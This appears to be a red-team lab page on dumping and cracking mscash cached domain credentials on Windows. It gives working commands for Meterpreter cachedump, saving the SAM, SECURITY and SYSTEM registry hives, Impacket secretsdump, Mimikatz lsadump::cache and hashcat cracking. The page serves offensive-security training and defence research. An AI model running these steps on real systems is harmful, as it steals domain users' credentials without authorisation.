Red Teaming Experiments
Red Teaming Experiments
linkedin
github
@spotheplanet
patreon
What is this?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Dumping Credentials from Lsass.exe Process Memory
Dumping Lsass.exe to Disk Without Mimikatz and Extracting Credentials
Dumping LSASS without Mimikatz with MiniDumpWriteDump == Reduced Chances of Getting Flagged by AVs
Dumping Hashes from SAM via Registry
Dumping SAM via esentutl.exe
Dumping LSA Secrets
Dumping and Cracking mscash - Cached Domain Credentials
Dumping Domain Controller Hashes Locally and Remotely
Dumping Domain Controller Hashes via wmic and Vssadmin Shadow Copy
Network vs Interactive Logons
Reading DPAPI Encrypted Secrets with Mimikatz and C++
T1214: Credentials in Registry
T1174: Password Filter
Forcing WDigest to Store Credentials in Plaintext
Dumping Delegated Default Kerberos and NTLM Credentials w/o Touching LSASS
Intercepting Logon Credentials via Custom Security Support Provider and Authentication Packages
Pulling Web Application Passwords by Hooking HTML Input Fields
Intercepting Logon Credentials by Hooking msv1_0!SpAcceptCredentials
Credentials Collection via CredUIPromptForCredentials
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Windows Kernel / Internals
Exploring Process Environment Block
ETW: Event Tracing for Windows 101
Parsing PE File Headers with C++
Exploring Injected Threads
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered by GitBook

Dumping and Cracking mscash - Cached Domain Credentials

This lab focuses on dumping and cracking mscash hashes after SYSTEM level privileges has been obtained on a compromised machine.

Mscash is a Microsoft hashing algorithm that is used for storing cached domain credentials locally on a system after a successful logon. It's worth noting that cached credentials do not expire. Domain credentials are cached on a local system so that domain members can logon to the machine even if the DC is down. It's worth noting that mscash hash is not passable - i.e PTH attacks will not work.

Execution

Meterpreter

Note that in meterpreter session, hashdump only dumps the local SAM account hashes:

attacker@kali
hashdump

To dump cached domain credentials in mscash format, use a post exploitation module cachedump:

attacker@kali
getuid
getsystem
use post/windows/gather/cachedump
run

Secretsdump

Impacket's secrestdump tool allows us to dump all the credentials that are stored in registry hives SAM, SECURITY and SYSTEM, so firstly, we need to write those out:

attacker@victim
reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save

Once the hives are retrieved, they can can be pulled back to kali linux to extract the hashes:

attacker@kali
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

Mimikatz

lsadump::cache

Cracking mscash / mscache with HashCat

To crack mscache with hashcat, it should be in the following format:

$DCC2$10240#username#hash

Meterpreter's cachedump module's output cannot be used in hashcat directly, but it's easy to do it.

Below shows the original output format from cachedump and the format accepted by hashcat:

echo ; cat hashes.txt ; echo ; cut -d ":" -f 2 hashes.txt

Let's try cracking it with hashchat now:

attacker@kali
hashcat -m2100 '$DCC2$10240#spot#3407de6ff2f044ab21711a394d85f3b8' /usr/share/wordlists/rockyou.txt --force --potfile-disable

Where Are Domain Credentials Cached

This can be seen via regedit (running with SYSTEM privileges) in the following key:

HKEY_LOCAL_MACHINE\SECURITY\Cache

NL$1..10 are the cached hashes for 10 previously logged users:

By nulling out the Data fields one could remove the credentials from cache. Once cached credentials are removed, if no DC is present, a user trying to authenticate to the system will see:

References

​

​

Previous
Dumping LSA Secrets
Next
Dumping Domain Controller Hashes Locally and Remotely
Last updated 2 years ago
Contents
Execution
Meterpreter
Secretsdump
Mimikatz
Cracking mscash / mscache with HashCat
Where Are Domain Credentials Cached
References